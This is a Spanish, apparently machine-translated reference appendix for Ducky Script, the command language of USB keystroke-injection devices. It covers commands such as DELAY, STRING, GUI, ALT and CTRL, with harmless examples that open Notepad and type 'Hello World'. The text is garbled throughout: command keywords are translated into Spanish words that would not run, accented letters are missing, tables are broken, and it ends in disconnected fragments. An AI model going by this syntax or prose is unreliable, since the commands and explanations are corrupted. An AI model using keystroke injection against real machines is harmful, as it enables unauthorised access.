Apndice: Ducky Guin APIREMSimilar al comando REM en Basic y otros lenguajes, no se procesarn las lneas que comienzan con REM. REM es un comentario. Comando ^ ^ | REM |REM Las siguientes tres lneas de ejecutar una lnea de comandos en WindowsGUI rCmd STRINGENTRARDEFAULT_DELAY o DEFAULTDELAYDEFAULT_DELAY o DEFAULTDELAY se utiliza para definir cunto tiempo (en milisegundos * 10) se debe esperar entre cada comando posterior. DEFAULT_DELAY debe ser emitido al comienzo de la secuencia de comandos patito y es opcional. Si no se especifica la DEFAULT_DELAY se traducir en ms rpida ejecucin de scripts ducky. Este comando es principalmente til para depurar. ^ ^ Comando Parmetros ^ | DEFAULT_DELAY | // n * 10 ms // | | DEFAULTDELAY | // n * 10 ms // |DEFAULT_DELAY 10REM retrasa 100 ms entre cada secuencia de comandos subsiguienteRETRASORETRASO crea una pausa momentnea en el guin patito. Esto es muy til para la creacin de un momento de pausa entre los comandos secuenciales que pueden tener el equipo de destino algn tiempo para procesar. RETRASO tiempo se especifica en milisegundos entre 1 y 10000. comandos de retardo mltiple se puede utilizar para crear retrasos largos. ^ ^ Comando Parmetros ^ | RETRASO | // n * 10 ms // |RETRASO 50REM esperar 500ms antes de continuar con el siguiente comando.CADENACADENA procesa el siguiente texto teniendo especial cuidado de autocorreccin. CADENA puede aceptar uno o varios caracteres. ^ ^ Comando Parmetros ^ | CUERDAS | a ... z A ... Z 0..9 ...) `~ + = _-" '!; . ? / \ Y tubos |GUI rRETRASO 50Notepad.exe CADENAENTRARRETRASO 100CADENA Hello World!WINDOWS o GUIEmula Windows-Key, a veces conocido como la tecla Sper. ^ ^ Parmetros opcionales Comando ^ | GUI | Individual Char | | VENTANAS | Individual Char |GUI rREM celebrar la r de Windows-llave y prensa, en los sistemas de Windows que aparece en el men Ejecutar.MENU o APPEmula la tecla App, a veces conocido como la tecla de men o la tecla de men de contexto. En los sistemas Windows es similar a la combinacin de teclas SHIFT F10, produciendo el men similar a un clic derecho. Comando ^ ^ | APP | | MENU |GUI dMENCADENA vCADENA d// Cambiar al escritorio, tire hacia arriba de men contextual y elegir acciones V, despus cambia d muestran los iconos del escritorio de Windows //SHIFTA diferencia de Bloq Mays, control de travesa para fresco, el comando SHIFT se puede utilizar cuando se navega campos para seleccionar texto, entre otras funciones. Comando ^ ^ ^ Opcional Parmetro | SHIFT | DELETE, HOME, INSERT, RePg, AvPg, VENTANAS, GUI, UPARROW, Downarrow, FLECHA IZQUIERDA, FLECHA DERECHA, TAB |INSERT SHIFTREM es pasta para la mayora de sistemas operativosALTEncontrado a la izquierda de la tecla de espacio en la mayora de los teclados, la tecla ALT es fundamental en muchas de las operaciones de automatizacin. ALT es envidioso de CONTROL. Comando ^ ^ ^ Opcional Parmetro | ALT | FIN, ESC, ESC, F1 ... F12, individual Char, ESPACIO, TAB |GUI rRETRASO 50Notepad.exe CADENAENTRARRETRASO 100CADENA Hello WorldALT fCADENA sREM alt-f se detiene en el men Archivo y s salva. Esta dos combo de teclas es la razn por la ALT es celoso de leetness de CONTROL y CTRL + SCONTROL o CTRLEl rey de clave combos, CONTROL es todo poderoso. Comando ^ ^ ^ Parmetros opcionales | CONTROL | DESCANSO, PAUSA, F1 ... F12, ESC, ESC, individual Char | | CTRL | DESCANSO, PAUSA, F1 ... F12, ESC, ESC, individual Char |ESCAPE DE CONTROLREM esto es equivalente a la clave GUI en WindowsTeclas de flechaComando ^ ^ | Downarrow o DOWN | | FLECHA IZQUIERDA o A LA IZQUIERDA | | FLECHA DERECHA o A LA DERECHA | | UPARROW o UP |Comandos extendidasComando ^ ^ ^ Notas | INTER o PAUSA | Para el combo infame CTRL RECESO | | BloqMays | Control de crucero para enfriar. Alterna | | DELETE | | | FIN | Cundo es que alguna vez | | ESC o ESCAPE | Puede nunca | | HOME | No hay lugar como el | | INSERT | | | BLOQ NUM | Alterna bloqueo numrico | | RePg | | | AvPg | |
Ejemplo 1:
...
Software Windows
acciones?
La solucin es simple.
DE ACUERDO.
Comando:
